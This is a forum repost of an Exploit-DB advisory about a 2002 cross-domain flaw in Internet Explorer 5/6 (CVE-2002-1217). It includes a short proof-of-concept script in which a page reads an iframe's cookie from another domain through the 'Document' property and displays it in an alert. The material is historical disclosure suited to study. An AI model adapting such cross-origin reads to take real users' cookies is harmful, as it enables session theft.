Exploit Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21940
Проверка EDB
  1. Пройдено
Автор
GREYMAGIC SOFTWARE
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2002-1217
Дата публикации
2002-10-15
Код:
source: https://www.securityfocus.com/bid/5963/info

Microsoft Internet Explorer (MSIE) is prone to a vulnerability that may enable a frame or iframe to gain unauthorized access to the Document Object Model (DOM) of other frames/iframes in a different domain. This is possible because MSIE does not perform adequate access control checks on all frame properties. While access to the 'document' property across domains is properly restricted, access to 'Document' is not. This may allow an attacker to violate the browser Same Origin Policy and gain unauthorized access to the properties of frames and iframes that are in a different domain. 

<script language="jscript">
onload=function () {
    // Timer necessary to prevent weird behavior in some conditions
    setTimeout(
        function () {
            alert(document.getElementById("oVictim").Document.cookie);
        },
        100
    );
}
</script>
<iframe src="http://example.com" id="oVictim"></iframe>
 
Источник
www.exploit-db.com

Похожие темы